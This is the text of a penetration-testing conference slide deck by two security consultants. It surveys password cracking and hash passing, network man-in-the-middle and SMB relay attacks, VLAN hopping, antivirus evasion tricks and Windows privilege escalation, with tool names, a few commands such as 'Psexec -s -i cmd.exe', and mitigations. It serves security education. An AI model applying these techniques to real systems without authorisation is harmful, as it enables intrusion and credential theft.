attack all the layers secure 360
DESCRIPTION
This presentation is intended to provide an overview of vulnerabilities and attack techniques that are popular in penetration testing at the moment. Vulnerabilities related to the application, network, and server layers will be covered along with current anti-virus bypass and privilege escalation techniques used by attackers and penetration testers. This presentation should be interesting to security professionals and system administrators looking for more insight into real world attacks. Karl Fosaaen and I put this together for Secure 360 in Minneapolis. We hope you enjoy it. More security blogs by the authors can be found @ https://www.netspi.com/blog/TRANSCRIPT
INTRODUCTIONS
Scott Sutherland
Security Consultant @ NetSPI
Twitter: @_nullbind
Karl Fosaaen
Security Consultant @ NetSPI
Twitter: @kfosaaen
We specialize in both things and stuff!
OVERVIEW
• Why do companies pen test?
• Attacking passwords
• Attacking protocols
• Attacking applications
• Bypassing AV
• Windows Escalation
• Conclusions
WHY DO COMPANIES PEN TEST?
• Compliance requirements
• Third party requests
• Identify unknown security gaps
• Validate existing security controls
• Prioritize existing security initiatives
• Prevent data breaches
PENETRATION TEST GOALS
• Identify and understand the impact of vulnerabilities at the application, system, and network layers
• Prioritize remediation
• Understand ability to detect and respond to attacks
PENETRATION TEST OBJECTIVES
• *Complete client specific objectives
• Gain access to critical systems, sensitive data, and application functionality
• Attack Surfaces Applications Networks Servers
• Attack Categories Configuration issues Code vulnerabilities Missing patches
OVERVIEW
• Attacking passwords
• Attacking protocols
• Attacking applications
• Bypassing AV
• Escalation
ATTACKING PASSWORDS
• Dictionary Attacks
• Dump Hashes and Crack
• Dump Hashes and PTH
• Impersonate
• Dump in Cleartext!
ATTACKING PASSWORDS
1997 2000s 2001 2007 2008 2010 2012
ATTACKING PASSWORDS: DICTIONARY
• Dictionary Attacks Enumerate users
- Null SMB logins, RPC, *SID BF, SNMP, LDAP, SharePoint, etc Attack!
• Are users getting smarter? Sort of… - “Spring2013” meets password complexity requirements
ATTACKING PASSWORDS: CRACKING
• Dumping Hashes and Cracking John
Rainbow Tables
oclHashcat plus
ATTACKING PASSWORDS: CRACKING
ATTACKING PASSWORDS: PASSING
• Dumping and Passing Hashes Pass the hash kit
Metasploit
PTH everything
ATTACKING PASSWORDS: IMPERSONATE
• Impersonate
Incognito
WCE
ATTACKING PASSWORDS: CLEARTEXT
• Dump in Cleartext! All the applications!
- Egyp7’s script
WCE
Mimikatz
OVERVIEW
• Attacking passwords
• Attacking protocols
• Attacking applications
• Bypassing AV
• Windows Escalation
ATTACKING PROTOCOLS
• ARP: Address Resolution Protocol
• NBNS: NetBIOS Name Service
• SMB: Server Message Block
• DTP: Dynamic Trunking Protocol
• VTP: VLAN Trunking Protocol
• Honorable Mentions
ATTACKING PROTOCOLS: ARP
Address Resolution
Protocol
ATTACKING PROTOCOLS: ARP
• General MAC to IP association Layer 2
• Conditions Independent of user action Broadcast network
• Attacks MITM Monitoring MITM Injection DOS
ATTACKING PROTOCOLS: ARP
ATTACKING PROTOCOLS: ARP
Common ARP MITM attacks:
• Intercept Data SSN, Credit Cards, Healthcare data, etc Whole file parsing with NetworkMiner
• Intercept Passwords Cain will parse passwords for over 30 protocols
• Injection Content SQL injection – Web and direct database connections HTML injection – redirection, browser exploits UNC path injection – Force authentication Proxy and modify HTTP traffic with Burp Suite
ATTACKING PROTOCOLS: ARP
Common ARP MITM tools:
• Windows Tools Cain Ettercap-ng Interceptor-ng Nemesis
• Linux Tools Ettercap Dsniff Subterfuge Easycreds Loki Nemesis
ATTACKING PROTOCOLS: ARP
Common mitigating controls:
• Dynamic ARP Inspection
• Port Security
• Static Routes (not recommended)
ATTACKING PROTOCOLS: NBNS
NetBIOS Name Service
ATTACKING PROTOCOLS: NBNS
• General IP to hostname association Layer 5 / 7
• Constraints Dependent on user action Broadcast Network Windows Only
• Attacks MITM Monitoring MITM Injection DOS
ATTACKING PROTOCOLS: NBNS
ATTACKING PROTOCOLS: NBNS
ATTACKING PROTOCOLS: NBNS
ATTACKING PROTOCOLS: NBNS
Common NBNS MITM attacks:
• Intercept Data SSN, Credit Cards, Healthcare data, etc Whole file parsing with NetworkMiner
• Intercept Passwords Cain will parse passwords for over 30 protocols
• Injection Content SQL injection – Web and direct database connections HTML injection – redirection, browser exploits UNC path injection – Force authentication Proxy and modify traffic with Burp Suite
ATTACKING PROTOCOLS: NBNS
Common NBNS MITM tools:
• Windows Tools nbnspoof (python) Metasploit (nbns_response + other modules) Responder (python)
• Linux Tools nbnspoof (python) Metasploit (nbns_response + other modules) Responder (python)
ATTACKING PROTOCOLS: NBNS
Common mitigating controls:
• Create a WPAD (Web Proxy Auto-Discovery) server entry in DNS
• Disable NBNS (not highly recommended)
• Disable insecure authentication to help
limit impact of exposed hashes
• Enable packet signing to help prevent
SMB Relay attacks
ATTACKING PROTOCOLS: SMB
Server Message Block
ATTACKING PROTOCOLS: SMB
• General SMB is the come back kid! Layer 7
• Constraints Dependent on user action Any routable network No connecting back to originating host
• Attacks Command execution Shells..aaand shells
ATTACKING PROTOCOLS: SMB
ATTACKING PROTOCOLS: SMB
Historically SMB Relay has been used to:
• Execute arbitrary commands
• Obtain shells
Lately the community has been developing tools for doing things like:
• LDAP queries
• SQL queries
• Exchange services
• Mounting file systems
ATTACKING PROTOCOLS: SMB
Many tools support SMB Relay attacks:
• Windows Tools Metasploit (smb_relay and http_ntlmrelay) Interceptor-ng …this is a kind a pain in Windows
• Linux Tools Metasploit (smb_relay and http_ntlmrelay) Zack attack Subterfuge Squirtle
ATTACKING PROTOCOLS: SMB
Common mitigating controls:
• Enable packet signing to help prevent SMB Relay attacks
• Apply really old patches like if you missed out on the last decade…
ATTACKING PROTOCOLS: DTP
Dynamic Trunking Protocol
ATTACKING PROTOCOLS: DTP
• General 802.1Q encapsulation is in use Layer 2
• Constraints
Independent of user action Trunking is set to enabled or auto on switch port
• Attacks
Monitor network traffic for all VLANs, because all VLANs are allowed on a trunk by default *Full VLAN hopping
ATTACKING PROTOCOLS: DTP
ATTACKING PROTOCOLS: DTP
ATTACKING PROTOCOLS: DTP
ATTACKING PROTOCOLS: DTP
ATTACKING PROTOCOLS: DTP
• Intercept Data
SSN, Credit Cards, Healthcare data, etc
Whole file parsing with Network Minor
• Intercept Passwords
Cain will parse passwords for over 30 protocols
ATTACKING PROTOCOLS: DTP
Common DTP spoofing tools:
• Windows Tools
I got nothing…
• Linux Tools
Yersinia
ATTACKING PROTOCOLS: DTP
Common mitigating controls:
• Use dedicated VLAN ID for all trunking ports
• Disable all unused ports and place them on a non routable VLAN
• Configure all user ports as access ports
to prevent trunk negotiation
• Configure frames with two 8021Q headers
• Configure strong VACLs
ATTACKING PROTOCOLS: VTP
VLAN Trunking Protocol
ATTACKING PROTOCOLS: VTP
• General
802.1Q encapsulation is in use
Layer 2
• Constraints
Independent of user action
VLANs are IP or MAC based
• Attacks
Ability to directly attack
systems on other VLANs
ATTACKING PROTOCOLS: VTP
ATTACKING PROTOCOLS: VTP
ATTACKING PROTOCOLS: VTP
Common next steps after VTP tag forgery:
• MITM attacks against remote VLAN systems
• Intercept/Modify Data
Usually limited to broadcast traffic (unless MITM)
ATTACKING PROTOCOLS: VTP
Tools for VLAN hopping attacks:
• Windows Tools
Native: Manually reconfigure via TCP/IP settings
• Linux Tools
Native: Modprobe + ifconfig
VoIP Hopper
Yersinia
ATTACKING PROTOCOLS: VTP
Common mitigating controls:
• Use dedicated VLAN ID for all trunking ports
• Disable all unused ports and place them on a non routable VLAN
• Configure all user ports as access ports
to prevent trunk negotiation
• Configure frames with two 8021Q headers
• Configure strong VACLs
ATTACKING PROTOCOLS: OTHERS
Honorable Mention:
• Pre-Execution Environment (PXE)
• Link-local Multicast Name Resolution (LLMNR)
• Dynamic Host Configuration Protocol (DHCP)
OVERVIEW
• Attacking passwords
• Attacking protocols
• Attacking applications
• Bypassing AV
• Windows Escalation
ATTACKING APPLICATIONS
• Default and weak passwords for everything Tools: Nmap, Nessus, Web Scour, Manuals, Google
• SQL injection Tools: Manually, web scanners, SQL Ninja, SQL Map, Metasploit
• RFI/Web Shells (JBOSS, Tomcat, etc.) Tools: Metasploit, Fuzzdb, and other web shellery
• Web directory traversals Tools: Manually, web scanners, Fuzzdb, Metasploit,
• MS08-067 Tools: Metasploit, exploitdb exploits, etc
OVERVIEW
• Attacking passwords
• Attacking protocols
• Attacking applications
• Bypassing AV
• Escalation
BYPASSING AV
• Weak Configurations
• Source Code Tricks
• Binary Modifications
• Process/Thread Manipulation
BYPASSING AV: WEAK CONFIGURATIONS
• Execute from share, UNC path, or external media
• Disable via GUI
• Create policy exceptions
• Kill processes
• Stop / Disable Services
• Uninstall (not recommended)
• Insecure service registration (c:\program.exe)
• Insecure file permissions (file replacement/mods)
• Execute from a DLL
• DLL pre loading, side loading etc
• GAC poisoning (potentially)
BYPASSING AV: SOURCE CODE TRICKS
Customize everything…and be crazy
• Migrate to and suspend or kill AV
• Modify comments (web languages)
• Replace variable names
• Modify application logic
• Use alternative functions
• Remove or modify resources
• Encode or encrypt payloads
• Compress payloads
• Add time delays
• Call NTDLL.DLL directly
BYPASSING AV: BINARY MODIFICATIONS
Same idea…be crazy
• Simple string modification
• Decompile/modify source
• Disassemble / modify application logic
• Disassemble /insert time delays
• Modify resource table (ditto/cffexplorer)
• Modify imports table (ditto/cffexplorer)
• Pack (UPX, Mpress, iExpress etc)
• Metasploit Pro Payloads:
dynamic exe generation
BYPASSING AV: PROCESS/THREAD MODS
Inject, inject, replace…
• Code injection (local and remote)
• DLL injection (local and remote)
• Process replacement
Common Tools:
• Powershell: Powersploit, etc
• Python and Py2exe
• Any language that supports
calls to native DLLs
OVERVIEW
• Attacking passwords
• Attacking protocols
• Attacking applications
• AV evasion
• Windows Escalation
WINDOWS ESCALATION: OVERVIEW
• Local user Local Administrator
• Domain user Local Administrator
• Local Administrator LocalSystem
• LocalSystem Domain User
• Locate Domain Admin Tokens
• LocalSystem Domain Admin
WINDOWS ESCALATION: LOCAL ADMIN
• Local user Local Administrator Excessive local group privileges (admin or power users) Cleartext credentials • Sysprep (unattend.xml/ini/txt) • Config files, scripts, logs, desktop folders • Tech support calls files
Weak application configurations that allow: • Restarting or reconfiguring services • Replacing application files • DLL pre or side loading • Executable injection via poorly registered services C:\Program Files (x86) vs “C:\Program Files (x86)”
Local and remote exploits (Metasploit: getsystem)
WINDOWS ESCALATION: LOCAL ADMIN
• Domain user Local Administrator Issues from last slide and…
Group policy: groups.xml
File shares accessible to domain users
Ability to log into domain workstations
Excessive database privileges (xp_cmdshell etc)
SMB Relay + cracking hashes
Other systems and applications that use integrated domain authentication…
WINDOWS ESCALATION: LOCAL ADMIN
• Local Administrator LocalSystem At.exe (on older systems) – we still see it! Accessibility Options • Replace accessibility options like utilman.exe, osk.exe and
sethc.exe with cmd.exe or other backdoor Create a custom service to run as LocalSystem • Psexec –s –i cmd.exe
Migrate to a system process • Remote process injection, MSF ps + migrate, and Incognito
Local and remote exploits • Metasploit: getsystem etc
SQL Server and Database links + xp_cmdshell
WINDOWS ESCALATION: FIND DA TOKENS
• Locate Domain Admin tokens Check locally ;) • incognito
Query the domain controllers • netsess.exe
Scan remote systems for running tasks • native tasklist or smbexec
Scan old Windows systems for NetBIOS
Shell spraying for tokens (not advised)
WINDOWS ESCALATION: DOMAIN ADMIN
• LocalSystem Domain Admin Pass-the-hash to target system • Local administrator account and shared service accounts • Manually via trusted connections or via MSF etc
Impersonate authentication token • Custom application, Incognito, WCE, Metasploit
Dump clear text domain credentials • Mimikatz, WCE, or Metasploit
Key logging MITM + sniffing (http integrated auth etc)
CONCLUSIONS
All can kind of be fixed
Most Networks
Kind of broken
Most Protocols
Kind of broken
Most Applications
Kind of broken
ATTACK ALL THE LAYERS!
ANY QUESTIONS?
ATTACK ALL THE LAYERS!
Scott Sutherland Principal Security Consultant Twitter: @_nullbind
Karl Fosaaen Security Consultant Twitter: @kfosaaen